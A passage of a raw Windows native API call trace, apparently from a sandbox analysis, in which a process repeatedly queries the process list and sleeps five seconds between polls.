returned 0x0 [0261.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.934] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.977] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.018] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.089] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 